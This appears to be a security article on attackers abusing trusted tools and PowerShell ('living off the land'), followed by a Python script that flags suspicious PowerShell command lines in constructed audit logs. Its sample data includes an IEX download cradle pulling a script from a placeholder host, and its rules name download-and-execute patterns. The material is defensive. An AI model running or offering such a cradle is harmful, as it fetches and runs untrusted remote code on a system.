For years, the traditional approach to cybersecurity has been to block malware and stop attacks, but this model is no longer effective as threat actors have evolved their tactics.

Today, attackers are moving away from using malware and instead exploiting trusted tools, native binaries, and legitimate admin utilities that are already present within an organization’s environment.

This approach enables them to move laterally, escalate privileges, and persist without raising alarms, making it difficult for security teams to detect and respond to these types of attacks.

The abuse of trusted tools and services, including those affected by known vulnerabilities such as CVE-2017-0144, CVE-2019-0708, and CVE-2020-14882, is a significant concern because it lets attackers blend in with normal network activity, making malicious behavior hard to identify.

Likewise, the use of legitimate admin utilities such as PowerShell to carry out attacks, including ones that exploit vulnerabilities like CVE-2021-42287 and CVE-2021-42288, has become increasingly common, which underlines the need for organizations to rethink their security strategies.

To stay ahead of these evolving threats, organizations must adopt a more proactive and comprehensive approach to security: monitoring for suspicious activity, implementing robust access controls, and regularly updating and patching software. Patching prevents the exploitation of known vulnerabilities such as those in the Windows Print Spooler service, which was affected by CVE-2021-1675 and CVE-2021-34527.
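The monitoring the article calls for has to look at how a trusted binary is being used, not whether it is present. The following Python script is an added example, not code from the article: it parses a handful of constructed PowerShell command-line audit records (the key=value log shape, host names, user names and URL are all made up for this illustration), applies a few well-known usage rules, and decodes any `-EncodedCommand` payload so an analyst can see what was actually run.

```python
import base64
import re

# Constructed PowerShell command-line audit records in a simple key=value shape.
# These are made-up inputs for this example, not telemetry from any real system;
# the host names, users and the example.invalid URL are placeholders.
# The encoded payload is built here so the sample stays a valid -EncodedCommand
# argument (base64 over UTF-16LE, which is what PowerShell expects).
ENCODED_PAYLOAD = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode("ascii")

SAMPLE_LOGS = [
    "2024-05-01T10:00:01Z host=ws01 user=alice proc=powershell.exe cmd=Get-ChildItem C:\\Reports",
    "2024-05-01T10:03:17Z host=ws02 user=svc-backup proc=powershell.exe "
    "cmd=powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED_PAYLOAD,
    "2024-05-01T10:05:44Z host=ws03 user=bob proc=powershell.exe "
    "cmd=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')",
    "2024-05-01T10:07:02Z host=ws01 user=alice proc=powershell.exe cmd=Get-Service | Where-Object Status -eq Running",
]

# One record per line: timestamp, host, user, process image, then the full command line.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) proc=(?P<proc>\S+) cmd=(?P<cmd>.*)$"
)

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Usage patterns that are rare in routine administration and worth a look.
# Each is a (rule name, compiled regex) pair evaluated against the command line.
RULES = [
    ("encoded_command", ENCODED_RE),
    ("execution_policy_bypass", re.compile(r"(?i)-executionpolicy\s+bypass|-ep\s+bypass")),
    ("download_cradle", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|iwr\s|net\.webclient")),
    ("invoke_expression", re.compile(r"(?i)\biex\b|invoke-expression")),
]


def parse_line(line):
    """Split one audit record into its fields; return None for lines that do not fit the shape."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def decode_encoded_command(blob):
    """Turn a -EncodedCommand argument back into script text for triage (None if it is not valid)."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Return (list of rule names that fired, decoded script text or None) for one record."""
    cmd = record["cmd"]
    hits = [name for name, pattern in RULES if pattern.search(cmd)]
    decoded = None
    enc = ENCODED_RE.search(cmd)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
    return hits, decoded


def scan(lines):
    """Run every rule over every record and return one alert dict per record that fired."""
    alerts = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        hits, decoded = analyze(record)
        if hits:
            alerts.append({
                "ts": record["ts"],
                "host": record["host"],
                "user": record["user"],
                "rules": hits,
                "decoded": decoded,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(f"{alert['ts']} {alert['host']} {alert['user']} rules={alert['rules']} decoded={alert['decoded']!r}")
```

Two of the four constructed records fire and the two routine ones do not. The rules are deliberately narrow signatures; because living-off-the-land activity is designed to look like administration, they are a starting point to be paired with context the telemetry already carries, such as which account ran the tool, from which host, and under which parent process, rather than a complete detection on their own.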
